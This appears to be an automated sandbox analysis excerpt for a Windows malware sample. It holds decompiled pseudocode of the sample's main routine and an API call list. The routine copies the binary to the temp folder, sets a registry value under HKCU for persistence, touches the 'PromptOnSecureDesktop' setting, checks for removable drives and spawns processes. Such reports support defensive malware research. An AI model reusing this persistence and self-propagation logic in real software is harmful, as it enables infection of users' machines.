								_t283 = E0040ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0040EE08(0x4133d8,  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x412cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0040ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x61 && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t515 = _t304 - 2;
									if(_t304 != 2) {
										E00409145(_t515);
										_t438 = 1;
									}
								}
							}
							goto L19;
						} else {
							E00404280(_t438, 1); // executed
							_pop(_t438);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0040675C( &_v672,  &_v12, 0); // executed
							_t467 = _t467 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0040EC2E(_v8);
										_pop(_t438);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8);
									_t469 = _t467 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0040EE2A(_t438, _t459, 0, _t454);
										_t467 = _t469 + 0xc;
										goto L83;
									}
									_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t469 = _t469 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0040EE2A(_t438, _t459, 0, _t454);
									_t470 = _t469 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = lstrlenA( &_v1272);
									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E00406DC2(_t438) ^ 0x61616161;
										__eflags = _t328;
										_push(_t328);
										E0040F133();
										_t470 = _t470 + 0xc;
										L61:
										_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8);
										_t471 = _t470 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
											RegCloseKey(_v24);
										}
										E0040EE2A(_t438, _t459, 0, _t454);
										E0040EE2A(_t438,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0040EE2A(_t438,  &_v64, 0, 0x10);
										_t469 = _t471 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t438 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t438 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8));
														E0040EE2A(_v40, _t459, 0, _t454);
														_t469 = _t469 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
												E0040EE2A(_t438, _t459, 0, _t454);
												_t469 = _t469 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E004096FF(_t438);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12); // executed
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E00406DC2(_t438) ^ 0x61616161);
									E0040F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E00406CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0041070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E00409326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x41217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x412180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x61040108;
												 *0x412180 = 0x61040108;
												 *0x41217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E004096FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0040ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0040EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0040ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0040EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}





















































































                                                                                0x00409a7f
                                                                                0x00409a83
                                                                                0x00409a8a
                                                                                0x00409a90
                                                                                0x00409a97
                                                                                0x00409a9d
                                                                                0x0040a3cc
                                                                                0x0040a3d2
                                                                                0x0040a41c
                                                                                0x0040a42c
                                                                                0x0040a43a
                                                                                0x0040a440
                                                                                0x0040a448
                                                                                0x0040a452
                                                                                0x0040a45a
                                                                                0x0040a469
                                                                                0x0040a46b
                                                                                0x0040a470
                                                                                0x0040a475
                                                                                0x0040a47a
                                                                                0x0040a48a
                                                                                0x0040a48c
                                                                                0x0040a497
                                                                                0x0040a497
                                                                                0x0040a49d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a49f
                                                                                0x0040a4a7
                                                                                0x0040a4ac
                                                                                0x0040a4be
                                                                                0x0040a4c3
                                                                                0x00000000
                                                                                0x0040a4c3
                                                                                0x0040a4ae
                                                                                0x0040a4ae
                                                                                0x0040a4b3
                                                                                0x0040a4b5
                                                                                0x0040a4b9
                                                                                0x0040a4b9
                                                                                0x00000000
                                                                                0x0040a4b5
                                                                                0x0040a497
                                                                                0x0040a3da
                                                                                0x0040a406
                                                                                0x0040a407
                                                                                0x0040a409
                                                                                0x0040a40b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a3e8
                                                                                0x0040a3eb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a3ed
                                                                                0x0040a3f3
                                                                                0x0040a3f6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a3f8
                                                                                0x0040a3f8
                                                                                0x0040a3f8
                                                                                0x0040a400
                                                                                0x0040a400
                                                                                0x0040a414
                                                                                0x0040a419
                                                                                0x00000000
                                                                                0x00409aa3
                                                                                0x00409ab0
                                                                                0x00409ac2
                                                                                0x00409ac4
                                                                                0x00409ac4
                                                                                0x00409ad1
                                                                                0x00409ae1
                                                                                0x00409aef
                                                                                0x00409af4
                                                                                0x00409af9
                                                                                0x00409afb
                                                                                0x00409afb
                                                                                0x00409af9
                                                                                0x00409afd
                                                                                0x00409b14
                                                                                0x00409b1a
                                                                                0x00409b26
                                                                                0x00409b2b
                                                                                0x00409b33
                                                                                0x00409b36
                                                                                0x00409b3b
                                                                                0x00409b41
                                                                                0x00409c26
                                                                                0x00409c2b
                                                                                0x00409c2e
                                                                                0x00409c33
                                                                                0x0040a1de
                                                                                0x0040a1e4
                                                                                0x0040a1fd
                                                                                0x0040a211
                                                                                0x0040a214
                                                                                0x0040a219
                                                                                0x0040a21c
                                                                                0x0040a21f
                                                                                0x0040a2e2
                                                                                0x0040a305
                                                                                0x0040a308
                                                                                0x0040a30d
                                                                                0x0040a310
                                                                                0x0040a313
                                                                                0x0040a35a
                                                                                0x0040a35a
                                                                                0x0040a35f
                                                                                0x0040a361
                                                                                0x0040a3c2
                                                                                0x00409c05
                                                                                0x00409c06
                                                                                0x00409c06
                                                                                0x0040a363
                                                                                0x0040a369
                                                                                0x0040a397
                                                                                0x0040a397
                                                                                0x0040a39d
                                                                                0x0040a3a3
                                                                                0x0040a3aa
                                                                                0x0040a3b1
                                                                                0x0040a3b4
                                                                                0x0040a3b7
                                                                                0x00000000
                                                                                0x0040a3b7
                                                                                0x0040a36b
                                                                                0x0040a371
                                                                                0x0040a374
                                                                                0x0040a374
                                                                                0x0040a376
                                                                                0x0040a377
                                                                                0x0040a377
                                                                                0x0040a37d
                                                                                0x0040a380
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a38e
                                                                                0x0040a394
                                                                                0x00000000
                                                                                0x0040a394
                                                                                0x0040a318
                                                                                0x0040a31e
                                                                                0x0040a324
                                                                                0x0040a325
                                                                                0x0040a327
                                                                                0x0040a339
                                                                                0x0040a33b
                                                                                0x0040a33d
                                                                                0x0040a340
                                                                                0x0040a344
                                                                                0x0040a344
                                                                                0x0040a34c
                                                                                0x0040a351
                                                                                0x0040a354
                                                                                0x00000000
                                                                                0x0040a354
                                                                                0x0040a329
                                                                                0x0040a32b
                                                                                0x0040a32e
                                                                                0x0040a32e
                                                                                0x0040a330
                                                                                0x0040a331
                                                                                0x0040a331
                                                                                0x0040a337
                                                                                0x0040a337
                                                                                0x00000000
                                                                                0x0040a337
                                                                                0x0040a228
                                                                                0x0040a22b
                                                                                0x0040a231
                                                                                0x0040a234
                                                                                0x0040a237
                                                                                0x0040a27a
                                                                                0x0040a280
                                                                                0x0040a281
                                                                                0x0040a283
                                                                                0x0040a28e
                                                                                0x0040a28e
                                                                                0x0040a28e
                                                                                0x0040a291
                                                                                0x0040a294
                                                                                0x0040a297
                                                                                0x0040a2a5
                                                                                0x0040a2ad
                                                                                0x0040a2b4
                                                                                0x0040a2b4
                                                                                0x0040a2b7
                                                                                0x0040a2b7
                                                                                0x0040a2bd
                                                                                0x0040a2d0
                                                                                0x0040a2d5
                                                                                0x0040a2d5
                                                                                0x0040a2d8
                                                                                0x00000000
                                                                                0x0040a2d8
                                                                                0x0040a242
                                                                                0x0040a245
                                                                                0x0040a24b
                                                                                0x0040a24c
                                                                                0x0040a24e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a253
                                                                                0x0040a264
                                                                                0x0040a26c
                                                                                0x00000000
                                                                                0x0040a26c
                                                                                0x00409c39
                                                                                0x00409c3f
                                                                                0x0040a167
                                                                                0x0040a183
                                                                                0x0040a190
                                                                                0x0040a196
                                                                                0x0040a198
                                                                                0x0040a198
                                                                                0x0040a1a2
                                                                                0x0040a1b3
                                                                                0x0040a1b6
                                                                                0x0040a1bc
                                                                                0x0040a1bf
                                                                                0x0040a1c7
                                                                                0x0040a1cc
                                                                                0x0040a1cc
                                                                                0x0040a1bf
                                                                                0x0040a1a2
                                                                                0x00000000
                                                                                0x00409c54
                                                                                0x00409c56
                                                                                0x00409c5b
                                                                                0x00409c62
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409c74
                                                                                0x00409c79
                                                                                0x00409c7c
                                                                                0x00409c81
                                                                                0x00000000
                                                                                0x00409c90
                                                                                0x00409c94
                                                                                0x00409c97
                                                                                0x00409c9a
                                                                                0x00409e3e
                                                                                0x00409e3e
                                                                                0x00409e42
                                                                                0x0040a155
                                                                                0x0040a158
                                                                                0x0040a15d
                                                                                0x0040a161
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a161
                                                                                0x00409e66
                                                                                0x00409e6b
                                                                                0x00409e75
                                                                                0x00409e77
                                                                                0x0040a14a
                                                                                0x0040a14d
                                                                                0x0040a152
                                                                                0x00000000
                                                                                0x0040a152
                                                                                0x00409e98
                                                                                0x00409e9d
                                                                                0x00409ea0
                                                                                0x00409ea2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409eab
                                                                                0x00409eb0
                                                                                0x00409ec1
                                                                                0x00409ec8
                                                                                0x00409ed5
                                                                                0x00409edb
                                                                                0x00409ee3
                                                                                0x00409ee4
                                                                                0x00409ee8
                                                                                0x00409eeb
                                                                                0x00409ef2
                                                                                0x00409ef9
                                                                                0x00409efc
                                                                                0x00409efd
                                                                                0x00409f03
                                                                                0x00409f03
                                                                                0x00409f08
                                                                                0x00409f09
                                                                                0x00409f0e
                                                                                0x00409f11
                                                                                0x00409f2d
                                                                                0x00409f32
                                                                                0x00409f3b
                                                                                0x00409f41
                                                                                0x00409f44
                                                                                0x00409f46
                                                                                0x00409f4b
                                                                                0x00409f4b
                                                                                0x00409f67
                                                                                0x00409f6a
                                                                                0x00409f6a
                                                                                0x00409f73
                                                                                0x00409f82
                                                                                0x00409f8e
                                                                                0x00409f98
                                                                                0x00409f9d
                                                                                0x00409fb4
                                                                                0x00409fba
                                                                                0x00409fbc
                                                                                0x00409fc2
                                                                                0x00409fc9
                                                                                0x00409fcf
                                                                                0x00409fd2
                                                                                0x00409fd4
                                                                                0x00409fda
                                                                                0x00409fda
                                                                                0x00409fdd
                                                                                0x00409fe1
                                                                                0x00409fe7
                                                                                0x00409feb
                                                                                0x00409ff1
                                                                                0x00409ff4
                                                                                0x00409ff8
                                                                                0x00409ffb
                                                                                0x00409ffe
                                                                                0x0040a004
                                                                                0x0040a007
                                                                                0x0040a010
                                                                                0x0040a025
                                                                                0x0040a038
                                                                                0x0040a041
                                                                                0x0040a046
                                                                                0x0040a049
                                                                                0x0040a050
                                                                                0x0040a05e
                                                                                0x0040a05e
                                                                                0x0040a072
                                                                                0x0040a078
                                                                                0x0040a07f
                                                                                0x0040a08d
                                                                                0x0040a08d
                                                                                0x0040a093
                                                                                0x0040a093
                                                                                0x0040a007
                                                                                0x00409feb
                                                                                0x00409fe1
                                                                                0x0040a09a
                                                                                0x0040a09d
                                                                                0x0040a09f
                                                                                0x0040a0a2
                                                                                0x0040a0b6
                                                                                0x0040a0de
                                                                                0x0040a0e7
                                                                                0x0040a0ec
                                                                                0x0040a0fd
                                                                                0x0040a0fd
                                                                                0x0040a0a2
                                                                                0x0040a120
                                                                                0x0040a126
                                                                                0x0040a128
                                                                                0x0040a131
                                                                                0x0040a137
                                                                                0x0040a137
                                                                                0x0040a13a
                                                                                0x0040a13e
                                                                                0x0040a140
                                                                                0x0040a143
                                                                                0x0040a145
                                                                                0x0040a145
                                                                                0x0040a143
                                                                                0x00000000
                                                                                0x0040a13e
                                                                                0x00409ef4
                                                                                0x00409ef7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409ef7
                                                                                0x00409cac
                                                                                0x00409cb2
                                                                                0x00409cb4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409cd5
                                                                                0x00409cda
                                                                                0x00409cdf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409ce9
                                                                                0x00409cec
                                                                                0x00409d58
                                                                                0x00409d59
                                                                                0x00409d64
                                                                                0x00409d65
                                                                                0x00409d6a
                                                                                0x00409d7a
                                                                                0x00409d8b
                                                                                0x00409d9d
                                                                                0x00409da3
                                                                                0x00409da3
                                                                                0x00000000
                                                                                0x00409cf6
                                                                                0x00409cf6
                                                                                0x00409cfc
                                                                                0x00409cff
                                                                                0x00409cff
                                                                                0x00409d01
                                                                                0x00409d02
                                                                                0x00409d06
                                                                                0x00409d0a
                                                                                0x00409d16
                                                                                0x00409d16
                                                                                0x00409d17
                                                                                0x00409d1b
                                                                                0x00409d2f
                                                                                0x00409d2f
                                                                                0x00409d3e
                                                                                0x00409d41
                                                                                0x00409d49
                                                                                0x00409d4f
                                                                                0x00409d52
                                                                                0x00409da5
                                                                                0x00409da8
                                                                                0x00409db6
                                                                                0x00409db6
                                                                                0x00409db0
                                                                                0x00409db0
                                                                                0x00409db0
                                                                                0x00409db7
                                                                                0x00409db8
                                                                                0x00409dbf
                                                                                0x00409dc3
                                                                                0x00409dca
                                                                                0x00409dd1
                                                                                0x00409dd2
                                                                                0x00409dd7
                                                                                0x00409ddc
                                                                                0x00409e21
                                                                                0x00409e26
                                                                                0x00409e29
                                                                                0x00000000
                                                                                0x00409dde
                                                                                0x00409df5
                                                                                0x00409e0c
                                                                                0x00409e11
                                                                                0x00409e16
                                                                                0x00409e1c
                                                                                0x00409e2e
                                                                                0x00409e2e
                                                                                0x00409e38
                                                                                0x00000000
                                                                                0x00409e38
                                                                                0x00409df9
                                                                                0x00409dfd
                                                                                0x00409dff
                                                                                0x00409dff
                                                                                0x00409e04
                                                                                0x00000000
                                                                                0x00409e04
                                                                                0x00409d1d
                                                                                0x00409d1d
                                                                                0x00409d23
                                                                                0x00409d2a
                                                                                0x00409d2d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409d2d
                                                                                0x00000000
                                                                                0x00409d23
                                                                                0x00409d1b
                                                                                0x00409cec
                                                                                0x00409c81
                                                                                0x00409c3f
                                                                                0x00409b47
                                                                                0x00409b4a
                                                                                0x00409b4d
                                                                                0x00409b56
                                                                                0x00409b8b
                                                                                0x00409b91
                                                                                0x00409b92
                                                                                0x00409b94
                                                                                0x00409b9f
                                                                                0x00409b9f
                                                                                0x00409b9f
                                                                                0x00409ba4
                                                                                0x00409ba4
                                                                                0x00409bb3
                                                                                0x00409bb8
                                                                                0x00409bbf
                                                                                0x00409bbf
                                                                                0x00409bc2
                                                                                0x00409bc8
                                                                                0x00409bde
                                                                                0x00409be3
                                                                                0x00409be8
                                                                                0x00409bfa
                                                                                0x00409bff
                                                                                0x00409c02
                                                                                0x00409c02
                                                                                0x00409be8
                                                                                0x00000000
                                                                                0x00409bc8
                                                                                0x00409b58
                                                                                0x00409b5e
                                                                                0x00409b64
                                                                                0x00409b67
                                                                                0x00000000
                                                                                0x00409b69
                                                                                0x00409b6b
                                                                                0x00409b7a
                                                                                0x00409b7f
                                                                                0x00000000
                                                                                0x00409b7f
                                                                                0x00409b67

                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
                                                                                • SetErrorMode.KERNELBASE(00000003), ref: 00409A83
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00406511), ref: 00409A8A
                                                                                  • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                  • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                  • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
                                                                                • GetCommandLineA.KERNEL32 ref: 00409AFD
                                                                                • lstrlenA.KERNEL32(?), ref: 00409B99
                                                                                • ExitProcess.KERNEL32 ref: 00409C06
                                                                                • GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
                                                                                • lstrcatA.KERNEL32(?,?), ref: 00409D8B
                                                                                • lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
                                                                                • DeleteFileA.KERNEL32(00000022), ref: 00409E38
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
                                                                                • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
                                                                                • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
                                                                                • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
                                                                                • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
                                                                                • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
                                                                                • lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
                                                                                • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
                                                                                • wsprintfA.USER32 ref: 0040A0B6
                                                                                • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
                                                                                • lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
                                                                                • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
                                                                                • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
                                                                                • GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
                                                                                • GetCommandLineA.KERNEL32 ref: 0040A1E5
                                                                                  • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                  • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                  • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                • lstrlenA.KERNEL32(?), ref: 0040A288
                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                • DeleteFileA.KERNEL32(004133D8), ref: 0040A407
                                                                                • CreateThread.KERNEL32 ref: 0040A42C
                                                                                • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                • CreateThread.KERNEL32 ref: 0040A469
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                • String ID: "$"$"$%X%08X$D$P$PromptOnSecureDesktop$\
                                                                                • API String ID: 2089075347-2824936573
                                                                                • Opcode ID: 18b4ae6482f41c14cc79419ed77fb5de14a5e8e06cea60f144981a1212c6d878
                                                                                • Instruction ID: 2e8e4d28fd33f050895bc00b790e6664de298002562c0b6b0b892c26365fcd94
                                                                                • Opcode Fuzzy Hash: 18b4ae6482f41c14cc79419ed77fb5de14a5e8e06cea60f144981a1212c6d878
                                                                                • Instruction Fuzzy Hash: E95291B1D40259BBDB11DBA1CC49EEF7BBCAB04304F1444BBF509F6182D6788E948B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409326 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 284registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
